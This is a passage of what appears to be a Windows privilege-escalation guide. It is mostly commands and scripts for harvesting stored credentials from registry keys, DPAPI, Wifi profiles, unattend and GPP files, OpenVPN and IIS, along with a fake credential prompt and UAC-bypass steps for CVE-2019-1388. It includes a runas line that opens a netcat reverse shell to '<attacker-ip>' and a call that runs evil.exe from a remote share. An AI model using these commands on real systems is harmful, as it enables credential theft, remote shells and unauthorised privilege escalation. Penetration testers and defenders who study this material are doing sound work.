- Validate the caller context for privileged operations. Add PP/PPL checks before allowing process termination or handle return.
- Restrict IOCTLs (access masks, METHOD_*, input validation) and consider brokered models instead of direct kernel privileges.
Detection ideas for defenders
- Monitor user-mode opens of suspicious device names (e.g., \\.\amsdk*) and specific IOCTL sequences indicating abuse.
- Enforce Microsoft's vulnerable driver blocklist (HVCI/WDAC/Smart App Control) and maintain your own allow/deny lists.
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.
Check permissions of all folders inside PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
For more information about how to abuse this check:
Writable Sys Path +Dll Hijacking Privesc
Network
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Check for other known computers hardcoded on the hosts file
type C:\Windows\System32\drivers\etc\hosts
Network Interfaces & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
Check for restricted services from the outside
netstat -ano #Opened ports?
Routing Table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP Table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress
Firewall Rules
Check this page for Firewall related commands (list rules, create rules, turn off, turn off...)
More commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
The binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
If you get the root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI if nc should be allowed by the firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
To start bash as root easily, you can try --default-user root
You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Windows Credentials
Winlogon Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Credentials manager / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can use to log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.
Use cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred option in order to use the saved credentials. The following example is calling a remote binary via an SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Using runas with a provided set of credentials.
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or the Empire PowerShell module can also be used to extract these credentials.
DPAPI
The Data Protection API (DPAPI) provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to significantly contribute to entropy.
DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets. In scenarios involving system encryption, it utilizes the system's domain authentication secrets.
Encrypted user RSA keys, by using DPAPI, are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} represents the user's Security Identifier. The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file, typically consists of 64 bytes of random data. (It is important to note that access to this directory is restricted, preventing listing its contents via the dir command in CMD, though it can be listed through PowerShell).
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
You can use the mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credentials files protected by the master password are usually located in:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt them. You can extract many DPAPI masterkeys from memory with the sekurlsa::dpapi module (if you are root).
PowerShell Credentials
PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently. The credentials are protected using DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
To decrypt PS credentials from the file containing them you can do:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
Saved RDP Connections
You can find them on HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
and in HKCU\Software\Microsoft\Terminal Server Client\Servers\
Recently Run Commands
HKEY_USERS\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Remote Desktop Credential Manager
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with the appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module
Sticky Notes
People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.
This code was extracted from PowerUP:
function Get-ApplicationHost {
    $OrigError = $ErrorActionPreference
    $ErrorActionPreference = "SilentlyContinue"
    # Check if appcmd.exe exists
    if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
        # Create data table to house results
        $DataTable = New-Object System.Data.DataTable
        # Create and name columns in the data table
        $Null = $DataTable.Columns.Add("user")
        $Null = $DataTable.Columns.Add("pass")
        $Null = $DataTable.Columns.Add("type")
        $Null = $DataTable.Columns.Add("vdir")
        $Null = $DataTable.Columns.Add("apppool")
        # Get list of application pools
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
            # Get application pool name
            $PoolName = $_
            # Get username
            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
            $PoolUser = Invoke-Expression $PoolUserCmd
            # Get password
            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
            $PoolPassword = Invoke-Expression $PoolPasswordCmd
            # Check if credentials exists
            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
            }
        }
        # Get list of virtual directories
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
            # Get Virtual Directory Name
            $VdirName = $_
            # Get username
            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
            $VdirUser = Invoke-Expression $VdirUserCmd
            # Get password
            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
            $VdirPassword = Invoke-Expression $VdirPasswordCmd
            # Check if credentials exists
            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
            }
        }
        # Check if any passwords were found
        if( $DataTable.rows.Count -gt 0 ) {
            # Display results in list view that can feed into the pipeline
            $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
        }
        else {
            # Status user
            Write-Verbose 'No application pool or virtual directory passwords were found.'
            $False
        }
    }
    else {
        Write-Verbose 'Appcmd.exe does not exist in the default location.'
        $False
    }
    $ErrorActionPreference = $OrigError
}
SCClient / SCCM
Check if C:\Windows\CCM\SCClient.exe exists.
Installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading (Info from https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Files and Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in registry
SSH private keys can be stored inside the registry key HKCU\Software\OpenSSH\Agent\Keys so you should check if there is anything interesting in there:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
If the ssh-agent service is not running and you want it to automatically start on boot run:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
Tip
It looks like this technique is not valid anymore. I tried to create some ssh keys, add them with ssh-add and login via ssh to a machine. The registry HKCU\Software\OpenSSH\Agent\Keys doesn't exist and procmon didn't identify the use of dpapi.dll during the asymmetric key authentication.
Unattended files
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
You can also search for these files using metasploit: post/windows/gather/enum_unattend
Example content:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
        <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
    </AutoLogon>
    <UserAccounts>
        <LocalAccounts>
            <LocalAccount wcm:action="add">
                <Password>*SENSITIVE*DATA*DELETED*</Password>
                <Group>administrators;users</Group>
                <Name>Administrateur</Name>
            </LocalAccount>
        </LocalAccounts>
    </UserAccounts>
SAM & SYSTEM backups
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud Credentials
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Search for a file called SiteList.xml
Cached GPP Password
A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.
To mitigate this risk, a function was developed to scan for locally cached GPP files containing a "cpassword" field that is not empty. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security vulnerability.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) for these files:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
To decrypt the cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Using crackmapexec to get the passwords:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
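The scanner described above (locally cached GPP files with a non-empty cpassword) and the unattended answer files listed earlier are the same kind of audit: deployment artefacts that leave credentials on disk. As an added example, not code from HackTricks, PowerSploit or any other project, the Python triage script below parses constructed copies of both file types and reports each credential field with its account and encoding, decoding the reversible Base64 of the answer file but only flagging the GPP value. The account attribute names it checks (userName, accountName, runAs, username) are assumed to cover the GPP file types listed above.

```python
"""Offline triage of Windows deployment artefacts for leftover credentials.
Added example (not code from the HackTricks page or any project): scans the text of
collected answer files (unattend.xml / sysprep.xml) and cached GPP XML (Groups.xml,
Services.xml, ...) and reports every credential field. Both XML samples are constructed."""
import base64
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List, Optional

# Marker Windows writes over processed secrets in the cached answer file.
SCRUBBED = "*SENSITIVE*DATA*DELETED*"
# Attributes in which the common GPP XML types name the affected account (assumed list).
GPP_ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample: AutoLogon secret "Passw0rd!" stored the way Windows does it
# when PlainText is false (secret + literal "Password", UTF-16LE, then Base64).
ENCODED_AUTOLOGON = base64.b64encode("Passw0rd!Password".encode("utf-16-le")).decode()
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <AutoLogon>
      <Password><Value>@@PW@@</Value><PlainText>false</PlainText></Password>
      <Enabled>true</Enabled><Username>Administrateur</Username>
    </AutoLogon>
    <UserAccounts><LocalAccounts><LocalAccount>
      <Password><Value>*SENSITIVE*DATA*DELETED*</Value><PlainText>true</PlainText></Password>
      <Group>administrators</Group><Name>Administrateur</Name>
    </LocalAccount></LocalAccounts></UserAccounts>
  </component></settings>
</unattend>""".replace("@@PW@@", ENCODED_AUTOLOGON)

# Constructed Groups.xml; the cpassword value is the one quoted on this page.
SAMPLE_GROUPS = """<Groups>
  <User name="LocalAdmin" changed="2015-05-06 05:50:40">
    <Properties action="U" userName="LocalAdmin" neverExpires="1"
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
  </User>
</Groups>"""

@dataclass
class Finding:
    source: str             # artefact the field came from
    location: str           # element path inside the artefact
    account: Optional[str]  # account the credential belongs to, if named
    encoding: str           # "plaintext", "base64" or "gpp-aes"
    decoded: Optional[str]  # recovered value, None when not trivially reversible

def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]  # drop the "{namespace}" prefix ElementTree adds

def decode_unattend_value(value: str) -> Optional[str]:
    """Undo the Base64 + UTF-16LE used when PlainText is false; strips Windows' "Password" suffix."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not Base64, or not an even number of bytes
    return text[:-len("Password")] if text.endswith("Password") else text

def scan_unattend(xml_text: str, source: str) -> List[Finding]:
    """Report every non-empty, non-scrubbed <Password> element in an answer file."""
    findings = []
    for parent in ET.fromstring(xml_text).iter():
        for pw in (c for c in parent if _local(c.tag) == "Password"):
            value_el = next((c for c in pw if _local(c.tag) == "Value"), None)
            value = ((value_el.text if value_el is not None else pw.text) or "").strip()
            if not value or value == SCRUBBED:
                continue
            plain_el = next((c for c in pw if _local(c.tag) == "PlainText"), None)
            # The schema default is plain text; only an explicit "false" means encoded.
            is_plain = plain_el is None or (plain_el.text or "").strip().lower() != "false"
            account = next((c.text for c in parent if _local(c.tag) in ("Username", "Name")), None)
            findings.append(Finding(source, f"{_local(parent.tag)}/Password", account,
                                    "plaintext" if is_plain else "base64",
                                    value if is_plain else decode_unattend_value(value)))
    return findings

def scan_gpp(xml_text: str, source: str) -> List[Finding]:
    """Report every element with a non-empty cpassword attribute. The value is AES
    encrypted with the published GPP key, so it is flagged as exposed, not decrypted."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if not el.get("cpassword"):
            continue
        account = next((el.get(a) for a in GPP_ACCOUNT_ATTRS if el.get(a)), None)
        findings.append(Finding(source, f"{_local(root.tag)}/{_local(el.tag)}",
                                account, "gpp-aes", None))
    return findings

def audit(artifacts: Dict[str, str]) -> List[Finding]:
    """Dispatch each artefact (name -> XML text) to a scanner by its root element."""
    results: List[Finding] = []
    for source, text in artifacts.items():
        scanner = scan_unattend if _local(ET.fromstring(text).tag) == "unattend" else scan_gpp
        results.extend(scanner(text, source))
    return results

if __name__ == "__main__":
    print(*audit({"unattend.xml": SAMPLE_UNATTEND, "Groups.xml": SAMPLE_GROUPS}), sep="\n")
```

The scrubbed LocalAccount entry is skipped on purpose: only fields that still hold a value need remediation.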
IIS Web Config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Example of web.config with credentials:
<authentication mode="Forms">
    <forms name="login" loginUrl="/admin">
        <credentials passwordFormat = "Clear">
            <user name="Administrator" password="SuperAdminPassword" />
        </credentials>
    </forms>
</authentication>
OpenVPN credentials
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
    $encryptedbytes=$item.'auth-data'
    $entropy=$item.'entropy'
    $entropy=$entropy[0..(($entropy.Length)-2)]
    $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
        $encryptedBytes,
        $entropy,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
    Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Logs
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Ask for credentials
You can always ask the user to enter his credentials or even the credentials of a different user if you think he can know them (notice that asking the client directly for the credentials is really risky):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Possible filenames containing credentials
Known files that some time ago contained passwords in clear-text or Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Credentials in the RecycleBin
You should also check the Bin to look for credentials inside it
To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html
Inside the registry
Other possible registry keys with credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
Browsers History
You should check for dbs where passwords from Chrome or Firefox are stored.
Also check the history, bookmarks and favourites of the browsers, since some passwords may be stored there.
Tools to extract passwords from browsers:
- Mimikatz: dpapi::chrome
- SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) is a technology built within the Windows operating system that allows intercommunication between software components of different languages. Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).
COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. This registry is created by merging HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT.
Inside the CLSIDs of this registry you can find the child key InProcServer32, which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.
To learn how attackers use COM Hijacking as a persistence mechanism check:
Generic Password search in files and registry
Search for file contents
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for key names and passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
Tools that search for passwords
MSF-Credentials Plugin is an msf plugin I created to automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas automatically searches for all the files containing passwords mentioned in this page.
Lazagne is another great tool to extract credentials from a system.
The tool SessionGopher searches for sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM opens a new process (OpenProcess()) with full access. The same process also creates a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
Shared memory segments, referred to as pipes, enable process communication and data transfer.
Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.
When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, assuming it has the necessary SeImpersonate rights. Identifying a privileged process that communicates via a pipe you can mimic provides an opportunity to gain higher privileges by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.
Also the following tool allows to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer
Misc
File Extensions that could execute stuff in Windows
Check out the page https://filesec.io/
Monitoring Command Lines for passwords
When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 1
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
Stealing passwords from processes
From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass
If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it is possible to run a terminal or any other process as "NT\AUTHORITY SYSTEM" from an unprivileged user.
This makes it possible to escalate privileges and bypass UAC at the same time with the same vulnerability. Additionally, there is no need to install anything, and the binary used during the process is signed and issued by Microsoft.
Some of the affected systems are the following:
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
To exploit this vulnerability, it is necessary to perform the following steps:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
From Administrator Medium to High Integrity Level / UAC Bypass
Read this to learn about Integrity Levels:
Then read this to learn about UAC and UAC bypasses:
